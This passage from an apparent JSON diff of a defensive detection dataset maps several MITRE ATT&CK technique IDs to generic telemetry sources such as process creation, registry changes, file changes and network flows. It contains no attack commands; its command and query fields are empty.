"Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver metadata", + "description": "Data and information that describe a driver and activity around it such as driver issues reporting and driver integrity (Page hash, code) checking.", + "source_data_element": "host", + "relationship": "retrieved information about", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1137.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1137.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1137.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1547.013", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1534", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + 